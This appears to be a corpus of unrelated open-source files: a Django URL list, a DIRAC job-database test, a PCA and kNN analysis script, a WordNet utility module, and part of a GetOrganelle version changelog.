url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.txt/?$', views.taskTXT, name='taskTXT'),
url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.txt/(?P<message>.+)/?$', views.taskTXT, name='taskTXT'),
url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.html/?$', views.taskHTML, name='taskHTML'),
url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.html/(?P<message>.+)/?$', views.taskHTML, name='taskHTML'),
] | hicinformatic/DJANGO-Tracker | urls.py | Python | gpl-3.0 | 2,604 | [
"VisIt"
] | 1f7f0c215d5671fee10e8e5d4895c16b48b1a10b05b4e1708794fbd43745ed5f |
""" This tests only need the JobDB, and connects directly to it
Suggestion: for local testing, run this with::
python -m pytest -c ../pytest.ini -vv tests/Integration/WorkloadManagementSystem/Test_JobDB.py
"""
# pylint: disable=wrong-import-position
from DIRAC.Core.Base.Script import parseCommandLine
parseCommandLine()
from DIRAC import gLogger
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
jdl = """
[
Origin = "DIRAC";
Executable = "$DIRACROOT/scripts/dirac-jobexec";
StdError = "std.err";
LogLevel = "info";
Site = "ANY";
JobName = "helloWorld";
Priority = "1";
InputSandbox =
{
"../../Integration/WorkloadManagementSystem/exe-script.py",
"exe-script.py",
"/tmp/tmpMQEink/jobDescription.xml",
"SB:FedericoSandboxSE|/SandBox/f/fstagni.lhcb_user/0c2/9f5/0c29f53a47d051742346b744c793d4d0.tar.bz2"
};
Arguments = "jobDescription.xml -o LogLevel=info";
JobGroup = "lhcb";
OutputSandbox =
{
"helloWorld.log",
"std.err",
"std.out"
};
StdOutput = "std.out";
InputData = "";
JobType = "User";
]
"""
gLogger.setLevel('DEBUG')
def fakegetDIRACPlatform(OSList):
return {'OK': True, 'Value': 'pippo'}
jobDB = JobDB()
jobDB.getDIRACPlatform = fakegetDIRACPlatform
def test_insertAndRemoveJobIntoDB():
res = jobDB.insertNewJobIntoDB(jdl, 'owner', '/DN/OF/owner', 'ownerGroup', 'someSetup')
assert res['OK'] is True
jobID = res['JobID']
res = jobDB.getJobAttribute(jobID, 'Status')
assert res['OK'] is True
assert res['Value'] == 'Received'
res = jobDB.getJobAttribute(jobID, 'MinorStatus')
assert res['OK'] is True
assert res['Value'] == 'Job accepted'
res = jobDB.getJobOptParameters(jobID)
assert res['OK'] is True
assert res['Value'] == {}
res = jobDB.selectJobs({})
assert res['OK'] is True
jobs = res['Value']
for job in jobs:
res = jobDB.removeJobFromDB(job)
assert res['OK'] is True
def test_rescheduleJob():
res = jobDB.insertNewJobIntoDB(jdl, 'owner', '/DN/OF/owner', 'ownerGroup', 'someSetup')
assert res['OK'] is True
jobID = res['JobID']
res = jobDB.rescheduleJob(jobID)
assert res['OK'] is True
res = jobDB.getJobAttribute(jobID, 'Status')
assert res['OK'] is True
assert res['Value'] == 'Received'
res = jobDB.getJobAttribute(jobID, 'MinorStatus')
assert res['OK'] is True
assert res['Value'] == 'Job Rescheduled'
def test_getCounters():
res = jobDB.getCounters('Jobs', ['Status', 'MinorStatus'], {}, '2007-04-22 00:00:00')
assert res['OK'] is True
| petricm/DIRAC | tests/Integration/WorkloadManagementSystem/Test_JobDB.py | Python | gpl-3.0 | 2,640 | [
"DIRAC"
] | a2b19376ccb2877b6f1f0b50ca8998c99be0da8450bcc2c73fd4154c1a018366 |
# Principal Component Analysis Code :
from numpy import mean,cov,double,cumsum,dot,linalg,array,rank,size,flipud
from pylab import *
import numpy as np
import matplotlib.pyplot as pp
#from enthought.mayavi import mlab
import scipy.ndimage as ni
import roslib; roslib.load_manifest('sandbox_tapo_darpa_m3')
import rospy
#import hrl_lib.mayavi2_util as mu
import hrl_lib.viz as hv
import hrl_lib.util as ut
import hrl_lib.matplotlib_util as mpu
import pickle
from mvpa.clfs.knn import kNN
from mvpa.datasets import Dataset
from mvpa.clfs.transerror import TransferError
from mvpa.misc.data_generators import normalFeatureDataset
from mvpa.algorithms.cvtranserror import CrossValidatedTransferError
from mvpa.datasets.splitters import NFoldSplitter
import sys
sys.path.insert(0, '/home/tapo/svn/robot1_data/usr/tapo/data_code/BMED_8813_HAP/Data')
from data import Fmat_original
def pca(X):
#get dimensions
num_data,dim = X.shape
#center data
mean_X = X.mean(axis=1)
M = (X-mean_X) # subtract the mean (along columns)
Mcov = cov(M)
###### Sanity Check ######
i=0
n=0
while i < 82:
j=0
while j < 90:
if X[i,j] != X[i,j]:
print X[i,j]
print i,j
n=n+1
j = j+1
i=i+1
print n
##########################
print 'PCA - COV-Method used'
val,vec = linalg.eig(Mcov)
#return the projection matrix, the variance and the mean
return vec,val,mean_X, M, Mcov
def my_mvpa(Y,num2):
#Using PYMVPA
PCA_data = np.array(Y)
PCA_label_1 = ['Edge-1']*30 + ['Surface']*30 + ['Edge-2']*30
PCA_chunk_1 = ['Can-Edge-1']*5 + ['Book-Edge-1']*5 + ['Brown-Cardboard-Box-Edge-1']*5 + ['Cinder-Block-Edge-1']*5 + ['Tin-Box-Edge-1']*5 + ['White-Cardboard-Box-Edge-1']*5 + ['Can-Surface']*5 + ['Book-Surface']*5 + ['Brown-Cardboard-Box-Surface']*5 + ['Cinder-Block-Surface']*5 + ['Tin-Box-Surface']*5 + ['White-Cardboard-Box-Surface']*5 + ['Can-Edge-2']*5 + ['Book-Edge-2']*5 + ['Brown-Cardboard-Box-Edge-2']*5 + ['Cinder-Block-Edge-2']*5 + ['Tin-Box-Edge-2']*5 + ['White-Cardboard-Box-Edge-2']*5
clf = kNN(k=num2)
terr = TransferError(clf)
ds1 = Dataset(samples=PCA_data,labels=PCA_label_1,chunks=PCA_chunk_1)
cvterr = CrossValidatedTransferError(terr,NFoldSplitter(cvtype=1),enable_states=['confusion'])
error = cvterr(ds1)
return (1-error)*100
def result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC):
# Reduced Eigen-Vector Matrix according to highest Eigenvalues..(Considering First 20 based on above figure)
W = eigvec_total[:,0:num_PC]
m_W, n_W = np.shape(W)
#Projected Data:
Y = (W.T)*B
m_Y, n_Y = np.shape(Y.T)
return Y.T
if __name__ == '__main__':
Fmat = Fmat_original[41:123,:]
# Checking the Data-Matrix
m_tot, n_tot = np.shape(Fmat)
print 'Total_Matrix_Shape:',m_tot,n_tot
eigvec_total, eigval_total, mean_data_total, B, C = pca(Fmat)
#print eigvec_total
#print eigval_total
#print mean_data_total
m_eigval_total, n_eigval_total = np.shape(np.matrix(eigval_total))
m_eigvec_total, n_eigvec_total = np.shape(eigvec_total)
m_mean_data_total, n_mean_data_total = np.shape(np.matrix(mean_data_total))
print 'Eigenvalue Shape:',m_eigval_total, n_eigval_total
print 'Eigenvector Shape:',m_eigvec_total, n_eigvec_total
print 'Mean-Data Shape:',m_mean_data_total, n_mean_data_total
#Recall that the cumulative sum of the eigenvalues shows the level of variance accounted by each of the corresponding eigenvectors. On the x axis there is the number of eigenvalues used.
perc_total = cumsum(eigval_total)/sum(eigval_total)
num_PC=1
while num_PC <=20:
Proj = np.zeros((90,num_PC))
Proj = result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC)
# PYMVPA:
num=0
cv_acc = np.zeros(21)
while num <=20:
cv_acc[num] = my_mvpa(Proj,num)
num = num+1
plot(np.arange(21),cv_acc,'-s')
grid('True')
hold('True')
num_PC = num_PC+1
legend(('1-PC', '2-PCs', '3-PCs', '4-PCs', '5-PCs', '6-PCs', '7-PCs', '8-PCs', '9-PCs', '10-PCs', '11-PC', '12-PCs', '13-PCs', '14-PCs', '15-PCs', '16-PCs', '17-PCs', '18-PCs', '19-PCs', '20-PCs'))
ylabel('Cross-Validation Accuracy')
xlabel('k in k-NN Classifier')
show()
| tapomayukh/projects_in_python | sandbox_tapo/src/skin_related/BMED_8813_HAP/Features/multiple_features/best_kNN_PC/cross_validate_categories_kNN_PC_BMED_8813_HAP_scaled_method_II_area_force.py | Python | mit | 4,444 | [
"Mayavi"
] | 9392fb83504fac97e6d320223066d699570659222da5d174f53bc1249b0d5cc7 |
# Module wordnet.py
#
# Original author: Oliver Steele <steele@osteele.com>
# Project Page: http://sourceforge.net/projects/pywordnet
#
# Copyright (c) 1998-2004 by Oliver Steele. Use is permitted under
# the Artistic License
# <http://www.opensource.org/licenses/artistic-license.html>
"""Utility functions to use with the wordnet module.
Usage
-----
>>> dog = N['dog'][0]
# (First 10) adjectives that are transitively SIMILAR to the main sense of 'red'
>>> closure(ADJ['red'][0], SIMILAR)[:10]
['red' in {adjective: red, reddish, ruddy, blood-red, carmine, cerise, cherry, cherry-red, crimson, ruby, ruby-red, scarlet}, {adjective: chromatic}, {adjective: amber, brownish-yellow, yellow-brown}, {adjective: amethyst}, {adjective: aureate, gilded, gilt, gold, golden}, {adjective: azure, cerulean, sky-blue, bright blue}, {adjective: blue, bluish, blueish, light-blue, dark-blue, blue-black}, {adjective: bluish green, blue-green, cyan, teal}, {adjective: blushful, rosy}, {adjective: bottle-green}]
>>> # Adjectives that are transitively SIMILAR to any of the senses of 'red'
>>> #flatten1(map(lambda sense:closure(sense, SIMILAR), ADJ['red'])) # too verbose
>>> # Hyponyms of the main sense of 'dog'(n.) that are homophonous with verbs
>>> filter(lambda sense:V.get(sense.form), flatten1(map(lambda e:e.getSenses(), hyponyms(N['dog'][0]))))
['dog' in {noun: dog, domestic dog, Canis familiaris}, 'pooch' in {noun: pooch, doggie, doggy, barker, bow-wow}, 'toy' in {noun: toy dog, toy}, 'hound' in {noun: hound, hound dog}, 'basset' in {noun: basset, basset hound}, 'cocker' in {noun: cocker spaniel, English cocker spaniel, cocker}, 'bulldog' in {noun: bulldog, English bulldog}]
>>> # Find the senses of 'raise'(v.) and 'lower'(v.) that are antonyms
>>> filter(lambda p:p[0] in p[1].pointerTargets(ANTONYM), product(V['raise'].getSenses(), V['lower'].getSenses()))
[('raise' in {verb: raise, lift, elevate, get up, bring up}, 'lower' in {verb: lower, take down, let down, get down, bring down})]
"""
__author__ = "Oliver Steele <steele@osteele.com>"
__version__ = "2.0"
from wordnet import *
#
# Domain utilities
#
def _requireSource(entity):
if not hasattr(entity, 'pointers'):
if isinstance(entity, Word):
raise TypeError, `entity` + " is not a Sense or Synset. Try " + `entity` + "[0] instead."
else:
raise TypeError, `entity` + " is not a Sense or Synset"
def tree(source, pointerType):
"""
>>> dog = N['dog'][0]
>>> from pprint import pprint
>>> pprint(tree(dog, HYPERNYM))
['dog' in {noun: dog, domestic dog, Canis familiaris},
[{noun: canine, canid},
[{noun: carnivore},
[{noun: placental, placental mammal, eutherian, eutherian mammal},
[{noun: mammal},
[{noun: vertebrate, craniate},
[{noun: chordate},
[{noun: animal, animate being, beast, brute, creature, fauna},
[{noun: organism, being},
[{noun: living thing, animate thing},
[{noun: object, physical object}, [{noun: entity}]]]]]]]]]]]]
>>> #pprint(tree(dog, HYPONYM)) # too verbose to include here
"""
if isinstance(source, Word):
return map(lambda s, t=pointerType:tree(s,t), source.getSenses())
_requireSource(source)
return [source] + map(lambda s, t=pointerType:tree(s,t), source.pointerTargets(pointerType))
def closure(source, pointerType, accumulator=None):
"""Return the transitive closure of source under the pointerType
relationship. If source is a Word, return the union of the
closures of its senses.
>>> dog = N['dog'][0]
>>> closure(dog, HYPERNYM)
['dog' in {noun: dog, domestic dog, Canis familiaris}, {noun: canine, canid}, {noun: carnivore}, {noun: placental, placental mammal, eutherian, eutherian mammal}, {noun: mammal}, {noun: vertebrate, craniate}, {noun: chordate}, {noun: animal, animate being, beast, brute, creature, fauna}, {noun: organism, being}, {noun: living thing, animate thing}, {noun: object, physical object}, {noun: entity}]
"""
if isinstance(source, Word):
return reduce(union, map(lambda s, t=pointerType:tree(s,t), source.getSenses()))
_requireSource(source)
if accumulator is None:
accumulator = []
if source not in accumulator:
accumulator.append(source)
for target in source.pointerTargets(pointerType):
closure(target, pointerType, accumulator)
return accumulator
def hyponyms(source):
"""Return source and its hyponyms. If source is a Word, return
the union of the hyponyms of its senses."""
return closure(source, HYPONYM)
def hypernyms(source):
"""Return source and its hypernyms. If source is a Word, return
the union of the hypernyms of its senses."""
return closure(source, HYPERNYM)
def meet(a, b, pointerType=HYPERNYM):
"""Return the meet of a and b under the pointerType relationship.
>>> meet(N['dog'][0], N['cat'][0])
{noun: carnivore}
>>> meet(N['dog'][0], N['person'][0])
{noun: organism, being}
>>> meet(N['thought'][0], N['belief'][0])
{noun: content, cognitive content, mental object}
"""
return (intersection(closure(a, pointerType), closure(b, pointerType)) + [None])[0]
#
# String Utility Functions
#
def startsWith(str, prefix):
"""Return true iff _str_ starts with _prefix_.
>>> startsWith('unclear', 'un')
1
"""
return str[:len(prefix)] == prefix
def endsWith(str, suffix):
"""Return true iff _str_ ends with _suffix_.
>>> endsWith('clearly', 'ly')
1
"""
return str[-len(suffix):] == suffix
def equalsIgnoreCase(a, b):
"""Return true iff a and b have the same lowercase representation.
>>> equalsIgnoreCase('dog', 'Dog')
1
>>> equalsIgnoreCase('dOg', 'DOG')
1
"""
# test a == b first as an optimization where they're equal
return a == b or string.lower(a) == string.lower(b)
#
# Sequence Utility Functions
#
def issequence(item):
"""Return true iff _item_ is a Sequence (a List, String, or Tuple).
>>> issequence((1,2))
1
>>> issequence([1,2])
1
>>> issequence('12')
1
>>> issequence(1)
0
"""
return type(item) in (ListType, StringType, TupleType)
def intersection(u, v):
"""Return the intersection of _u_ and _v_.
>>> intersection((1,2,3), (2,3,4))
[2, 3]
"""
w = []
for e in u:
if e in v:
w.append(e)
return w
def union(u, v):
"""Return the union of _u_ and _v_.
>>> union((1,2,3), (2,3,4))
[1, 2, 3, 4]
"""
w = list(u)
if w is u:
import copy
w = copy.copy(w)
for e in v:
if e not in w:
w.append(e)
return w
def product(u, v):
"""Return the Cartesian product of u and v.
>>> product("123", "abc")
[('1', 'a'), ('1', 'b'), ('1', 'c'), ('2', 'a'), ('2', 'b'), ('2', 'c'), ('3', 'a'), ('3', 'b'), ('3', 'c')]
"""
return flatten1(map(lambda a, v=v:map(lambda b, a=a:(a,b), v), u))
def removeDuplicates(sequence):
"""Return a copy of _sequence_ with equal items removed.
>>> removeDuplicates("this is a test")
['t', 'h', 'i', 's', ' ', 'a', 'e']
>>> removeDuplicates(map(lambda tuple:apply(meet, tuple), product(N['story'].getSenses(), N['joke'].getSenses())))
[{noun: message, content, subject matter, substance}, None, {noun: abstraction}, {noun: communication}]
"""
accumulator = []
for item in sequence:
if item not in accumulator:
accumulator.append(item)
return accumulator
#
# Tree Utility Functions
#
def flatten1(sequence):
accumulator = []
for item in sequence:
if type(item) == TupleType:
item = list(item)
if type(item) == ListType:
accumulator.extend(item)
else:
accumulator.append(item)
return accumulator
#
# WordNet utilities
#
GET_INDEX_SUBSTITUTIONS = ((' ', '-'), ('-', ' '), ('-', ''), (' ', ''), ('.', ''))
def getIndex(form, pos='noun'):
"""Search for _form_ in the index file corresponding to
_pos_. getIndex applies to _form_ an algorithm that replaces
underscores with hyphens, hyphens with underscores, removes
hyphens and underscores, and removes periods in an attempt to find
a form of the string that is an exact match for an entry in the
index file corresponding to _pos_. getWord() is called on each
transformed string until a match is found or all the different
strings have been tried. It returns a Word or None."""
def trySubstitutions(trySubstitutions, form, substitutions, lookup=1, dictionary=dictionaryFor(pos)):
if lookup and dictionary.has_key(form):
return dictionary[form]
elif substitutions:
(old, new) = substitutions[0]
substitute = string.replace(form, old, new) and substitute != form
if substitute and dictionary.has_key(substitute):
return dictionary[substitute]
return trySubstitutions(trySubstitutions, form, substitutions[1:], lookup=0) or \
(substitute and trySubstitutions(trySubstitutions, substitute, substitutions[1:]))
return trySubstitutions(returnMatch, form, GET_INDEX_SUBSTITUTIONS)
MORPHOLOGICAL_SUBSTITUTIONS = {
NOUN:
[('s', ''),
('ses', 's'),
('ves', 'f'),
('xes', 'x'),
('zes', 'z'),
('ches', 'ch'),
('shes', 'sh'),
('men', 'man'),
('ies', 'y')],
VERB:
[('s', ''),
('ies', 'y'),
('es', 'e'),
('es', ''),
('ed', 'e'),
('ed', ''),
('ing', 'e'),
('ing', '')],
ADJECTIVE:
[('er', ''),
('est', ''),
('er', 'e'),
('est', 'e')],
ADVERB: []}
def morphy(form, pos='noun', collect=0):
"""Recursively uninflect _form_, and return the first form found
in the dictionary. If _collect_ is true, a sequence of all forms
is returned, instead of just the first one.
>>> morphy('dogs')
'dog'
>>> morphy('churches')
'church'
>>> morphy('aardwolves')
'aardwolf'
>>> morphy('abaci')
'abacus'
>>> morphy('hardrock', 'adv')
"""
from wordnet import _normalizePOS, _dictionaryFor
pos = _normalizePOS(pos)
fname = os.path.join(WNSEARCHDIR, {NOUN: 'noun', VERB: 'verb', ADJECTIVE: 'adj', ADVERB: 'adv'}[pos] + '.exc')
excfile = open(fname)
substitutions = MORPHOLOGICAL_SUBSTITUTIONS[pos]
def trySubstitutions(trySubstitutions, # workaround for lack of nested closures in Python < 2.1
form, # reduced form
substitutions, # remaining substitutions
lookup=1,
dictionary=_dictionaryFor(pos),
excfile=excfile,
collect=collect,
collection=[]):
import string
#exceptions = binarySearchFile(excfile, form)
for line in excfile.readlines():
if form == line.split()[0]:
form = line.split()[1]
## if exceptions:
## form = exceptions[string.find(exceptions, ' ')+1:-1]
#print dictionary.keys()
if lookup and dictionary.has_key(form):
if collect:
collection.append(form)
else:
return form
elif substitutions:
old, new = substitutions[0]
substitutions = substitutions[1:]
substitute = None
if endsWith(form, old):
substitute = form[:-len(old)] + new
#if dictionary.has_key(substitute):
# return substitute
form = trySubstitutions(trySubstitutions, form, substitutions) or \
(substitute and trySubstitutions(trySubstitutions, substitute, substitutions))
return (collect and collection) or form
elif collect:
return collection
return trySubstitutions(trySubstitutions, form, substitutions)
#
# Testing
#
def _test(reset=0):
import doctest, wntools
if reset:
doctest.master = None # This keeps doctest from complaining after a reload.
return doctest.testmod(wntools)
| PennNLP/SLURP | semantics/wntools.py | Python | gpl-3.0 | 12,392 | [
"Amber"
] | f8534cdff38ef2721093e07f4e5e63e92773dde8252b28c3acd32894975b27b5 |
def get_versions():
return versions[0]["number"]
versions = [
{
"number": "1.7.5.3",
"features": [
"1. get_organelle_from_reads.py: fix a bug when no qualified reads found (issue 123)",
"2. get_organelle_from_reads.py: pass --spades-options to pre-assembly for Mac M1 (issue 127)",
"3. get_organelle_from_reads.py:slim_spades_result: avoid ValueError",
"4. Update README.md: input read qc; issues->discussions",
],
"time": "2022-01-21 11:20 UTC-5"
},
{
"number": "1.7.5.2",
"features": [
"1. ask the questions publicly",
"2. statistical_func.py: weighted_gmm_with_em_aic(): fix a bug that will be triggered by "
" graph produced by join_spades_fastg_by_blast.py (reported by Mergi Dinka); "
" also fix a hidden mis-indexing issue there",
"3. Utilities/join_spades_fastg_by_blast.py: update on a v name issue "
" (issues 119)",
],
"time": "2021-12-15 02:35 UTC-5"
},
{
"number": "1.7.5.1",
"features": [
"1. make_batch_for_get_organelle.py: usage updated (reported by Fei Zhao@KIB)",
"2. space in the output path should be forbidden (reported by Manuela Sann@UFreiburg)",
],
"time": "2021-05-13 16:50 UTC+8"
},
{
"number": "1.7.5",
"features": [
"1. assembly_parser.py: fix a bug in estimation of the multiplicity of self-loop vertex, "
" which was falsely forced to be at least 2. (detected in a case of Yan Zhong@SCNU)",
"2. get_organelle_from_reads.py: typo in instruction for --max-extending-len corrected",
"3. redundant Assembly.merging_history() removed",
"4. fix a small bug in Assembly.is_sequential_repeat(), "
" isolate path_without_leakage as find_pair_closing_the_path",
"5. get_organelle_from_reads.py: fix an inconformity between the document and the default for -R, ",
"6. pipe_control_func.py: detect bowtie2 version improved",
],
"time": "2021-05-13 16:50 UTC+8"
},
{
"number": "1.7.4.1",
"features": [
"1. get_organelle_config.py: provide guidance for old code and new database incompatibility "
" (reported by Wenxiang Liu@SWFU)",
"2. assembly_parser.py: fix a bug after scaffolding with SPAdes path "
" (introduced in 1.7.4 feature 5; reported by Robin van Velzen@WUR)",
"3. update README.md with improved instruction",
],
"time": "2021-04-16 14:46 UTC+8"
},
{
"number": "1.7.4",
"features": [
"1. SequenceList: self.__indexed updated",
"2. get_static_html_context: requests.exceptions.ReadTimeout added"
"3. get_organelle_from_reads.py: '--overwrite' added; catch shutil.rmtree() errors; no python-lib -> error."
"4. get_organelle_from_*.py: turning off bandage if the result is not circular",
"5. assembly_parser.py: recording every overlap value rather than using a universal value for hifiasm "
" (in response to Christopher Benson@PSU)",
"6. optparse -> argparse (in response to Matthias Bernt@UFZ)",
"7. get_organelle_from_assembly.py: fix a bug with the malfunction of --continue when the input is gfa ",
"8. get_organelle_from_reads.py/disentangle_organelle_assembly.py: correct typos",
"9. pipe_control_func.py: map_with_bowtie2: warn reads integrity; build_bowtie2_db: rm small index",
"10. get_organelle_config.py: verbose log for bowtie2 and blast",
"11. update README.md with a reframed instruction",
],
"time": "2021-04-14 17:52 UTC+8"
},
{
"number": "1.7.4-pre2",
"features": [
"1. README.md: updated",
"2. partial fix: subprocess may 'fail' if error was in the directory name due to detecting error from log",
"3. scaffolding failures: try except AssertError to skip abnormal SPAdes paths (reported by Jinjing Jian@FDU)",
],
"time": "2021-03-04 23:55 UTC+8"
},
{
"number": "1.7.4-pre",
"features": [
"1. setup.py: modify scripts with utf-8",
"2. filtered -> extended, to clarify the process",
"3. get_organelle_from_reads.py: fix illustration of --which-blast, --which-bowtie2, --which-spades",
"4. fix a bug of pre_assembly_mapped_reads_for_base_cov introduced in 1.7.3.5b",
],
"time": "2021-02-26 11:30 UTC+8"
},
{
"number": "1.7.3.5b",
"features": [
"1. pipe_control_func: executable modified",
"2. realtime monitoring SPAdes log (solving the stuck in the segmentation fault)",
],
"time": "2021-02-24 18:11 UTC+8"
},
{
"number": "1.7.3.5a",
"features": [
"1. setup.py: fix a bug of codec for in-situ installation: invalid attempt to modify ._*py files",
"2. setup.py: fix a bug introduced by 1.7.3 while relocating GetOrganelle databases",
],
"time": "2021-02-24 12:30 UTC+8"
},
{
"number": "1.7.3.5",
"features": [
"1. README.md updated with embplant_mt notes",
"2. remove invalid --genes file check",
],
"time": "2021-02-23 01:11 UTC+8"
},
{
"number": "1.7.3.4",
"features": [
"1. fix bugs with '--config-dir'",
"2. customized databases (--genes/--ex-genes) passed to slim during pre-assembly & depth estimation",
"3. fix a bug with get_graph_coverages_range_simple() when no contigs received"
],
"time": "2021-02-18 19:00 UTC+8"
},
{
"number": "1.7.3.4-pre",
"features": [
"1. fix bugs with '--config-dir'",
"2. customized databases (--genes/--ex-genes) passed to slim during pre-assembly & depth estimation",
],
"time": "2021-02-12 02:00 UTC+8"
},
{
"number": "1.7.3.3",
"features": [
"1. early termination on invalid path characters for spades",
"2. fix a bug introduced by '--max-reads inf'",
"3. get_organelle_config.py: fix a bug if a new organelle types was added and '--use-local' was used",
],
"time": "2021-02-11 01:00 UTC+8"
},
{
"number": "1.7.3.2",
"features": [
"1. improve support for standard gfa format: E/L with optional fields",
],
"time": "2021-02-03 13:30 UTC+8"
},
{
"number": "1.7.3.1",
"features": [
"1. bug fixed: a bug of sorting consensus vertex names using smart_trans_for_sort",
"2. option --max-reads inf configured",
],
"time": "2021-01-25 13:00 UTC+8"
},
{
"number": "1.7.3",
"features": [
"1. fungus_nr added",
"2. relocate default GetOrganelle databases using GETORG_PATH",
"3. log platform info",
],
"time": "2021-01-20 12:30 UTC+8"
},
{
"number": "1.7.2b",
"features": [
"1. --reverse-lsc malfunction issue solved",
],
"time": "2020-12-19 14:00 UTC+8"
},
{
"number": "1.7.2a",
"features": [
"1. slim_graph.py: --evalue added",
"2. trans_word_cov: using log() to avoid large int converting",
"3. get_organelle_from_reads.py: add url to FAQ for incomplete result",
],
"time": "2020-12-16 23:50 UTC+8"
},
{
"number": "1.7.2",
"features": [
"1. assembly_parser.py: fix bugs in scaffolding",
],
"time": "2020-12-10 23:50 UTC+8"
},
{
"number": "1.7.2beta2",
"features": [
"1. get_organelle_from_reads.py: fix a bug in parsing options",
],
"time": "2020-12-09 UTC+8"
},
{
"number": "1.7.2beta",
"features": [
"1. slim_graph.py: fix a bug in parsing options (reported by Fei Zhao @ KIB)",
"2. automatically adding --phred-offset to avoid hammer failures",
"3. MergingHistory and ConsensusHistory added, in replace of using the names to detect merging history",
"4. Compatible with flye gfa format",
"5. Scaffolding function bug fixed & improved",
"6. get_organelle_config.py: example typo fixed",
],
"time": "2020-12-03 UTC+8"
},
{
"number": "1.7.1a",
"features": [
"output index bug fixed",
],
"time": "2020-07-28 01:30 UTC+8"
},
{
"number": "1.7.1",
"features": [
"get_organelle_from_assembly.py: do not convert gfa to fastg; ",
"Assembly.get_all_circular_paths(): optimized for plastome order",
"Assembly.reduce_to_subgraph: limit_offset_current_vertex -> bait_offsets; safer slim_graph.py performance",
"Assembly.get_all*_paths(): more detailed log info",
],
"time": "2020-07-25 02:50 UTC+8"
},
{
"number": "1.7.0c",
"features": [
"Utilities/slim_graph.py: fix a bug with anonym mode",
"README.md: updated"
],
"time": "2020-07-21 10:55 UTC+8"
},
{
"number": "1.7.0b",
"features": [
"1. get_organelle_from_reads.py: "
" 1) --ignore-k work for small k disentanglement "
" 2) fix a bug when input reads are very few ",
"2. better log info",
],
"time": "2020-07-08 22:30 UTC+8"
},
{
"number": "1.7.0",
"features": [
"1. get_organelle_from*.py: reorganize some importing code, fix minor issues",
"2. get_organelle_from_reads.py: rm output/seed/embplant_pt.initial.fq.spades by default",
],
"time": "2020-06-28 00:00 UTC+8"
},
{
"number": "1.7.0-beta7",
"features": [
"1. get_organelle_from_reads.py: "
" 1) fix option --max-extending-len typo "
" 2) --disentangle-time-limit 600 => 1800"
" 3) fix parameter estimation, pre-assembly minor bug",
"2. get_organelle_from_assembly.py: echo scaffolding.",
"3. assembly_parser.Assembly: "
" 1) --keep-temp generate more intermediate results "
" 2) Vertex: connections[end]: set() -> OrderedDict() "
" 3) fix a bug of multiplicity estimation on assembly graph with self-loop contigs",
"4. assembly_parser.SPAdesScaffolds: improved with more situations",
"5. README.md: updated",
],
"time": "2020-06-26 03:00 GMT-6"},
{
"number": "1.7.0-beta6",
"features": [
"1. get_organelle_from_reads.py: make pre-assembly and --ignore-k work for small read length",
],
"time": "2020-06-07 01:40 GMT-6"},
{
"number": "1.7.0-beta5",
"features": [
"1. get_organelle_config.py: alternative repository (gitee.com/jinjianjun/GetOrganelleDB) added",
"2. setup.py: dependent python lib requests added",
],
"time": "2020-05-28 18:40 GMT-6"},
{"number": "1.7.0-beta4",
"features": [
"1. Utilities/slim_fastg -> Utilities/slim_graph: 1) reorganized; 2) added support for gfa format graph file;"
"3) --max-slim-extending-len added",
"2. get_organelle_config.py added with *Database removed",
"3. get_organelle_from_reads.py: "
"1) use SPAdes generated scaffolds.paths to create gap containing scaffolds (assembly_parser.py)"
"2) rm --gradient-k "
"3) output fasta name modified"
"4) log Database version",
"4. get_organelle_from_assembly.py: "
"1) use SPAdes generated scaffolds.paths to create gap containing scaffolds (assembly_parser.py)"
"2) output fasta name modified"
"3) log Database version",
"5. assembly_parser.py: 1) merge_all_possible_vertices: fix a bug for overlap=0; 2) reduce_to_subgraph added; "
"3) processing_polymorphism: fix a bug; "
"4) class SPAdesScaffolds: use SPAdes generated scaffolds.paths to create gap containing scaffolds",
"6. Utilities/reconstruct_graph_from_fasta.py: fix a bug",
"7. Bandage generate temp file",
"8. README.md: updated",
],
"time": "2020-05-26 21:00 GMT-6"},
{"number": "1.6.4",
"features": [
"1. log plastome structure",
"2. --max-paths-num added for get_organelle*.py & disentangle*.py",
"3. reorganize codes: class SimpleAssembly & detect_plastome_architecture()",
"4. evaluate_assembly_using_mapping.py: --stat-mode, --bowtie2-options, --plot-font added",
"5. isolate GetOrganelleDep again",
"6. README.md: updated with conda installation",
],
"time": "2020-02-27 17:14 GMT-6"},
{"number": "1.6.3a",
"features": [
"1. Minor bugs fixes",
],
"time": "2020-02-27 17:14 GMT-6"},
{"number": "1.6.3-beta",
"features": [
"1. get_organelle_from_assembly.py & disentangle_organelle_assembly.py: --max-multiplicity added",
"2. Assembly.estimate_copy_and_depth_precisely() modified: constraint_max_function() for --max-multiplicity",
"3. Assembly.tag_in_between() modified",
"4. Assembly.estimate_copy_and_depth_by_cov() modified: min average coverage limit",
"5. Assembly.processing_polymorphism():"
" fix a bug when kmer-len repeats shared by two contigs; fix a bug that cause RuntimeError",
"6. Assembly: too many results due to palindromic repeats, problem solved",
"7. Utilities/reconstruct_graph_from_fasta.py & NaiveKmerNodeGraph added",
"8. Utilities/gfa_to_fasta.py, Utilities/fastg_to_gfa.py: description corrected",
"9. Assembly.parse_gfa(): compatibility increased",
"10. Utilities/gfa2fastg.py: compatibility increased",
"11. Assembly.estimate_copy_and_depth_precisely(): fix a bug on a rare case that multiplicities res are 4,8,4",
"12. README.md: updated",
],
"time": "2020-02-22 02:40 GMT-6"},
{"number": "1.6.2e",
"features": [
"1. seq_parser.py: fix a bug for fastq format: @*****#/1",
"2. get_organelle_from_reads.py: separate_fq_by_pair(), fix a bug when detecting pair info failed; ",
"3. evaluate_assembly_using_mapping.py: fix a bug for --plot-transparent",
"4. GetOrganelleLib.__init__.py: __version__",
"5. README.md: updated",
]},
{"number": "1.6.2d",
"features": [
"1. get_organelle_from_reads.py: fix a bug with '-F anonym'",
]},
{"number": "1.6.2c",
"features": [
"1. GetOrganelleLib/assembly_parser.py: SSC direction set according to orf",
"2. disentangle: --reverse-lsc option added; fix a bug for disentangling contigs with no overlaps",
"3. Utilities/plastome_arch_info.py: GC content added",
"4. get_organelle_from_reads.py: fix a bug for --flush-step inf"
]},
{"number": "1.6.2b",
"features": [
"1. fix a minor bug when raising ProcessingGraphFailed with # tags",
"2. setup.py install modified",
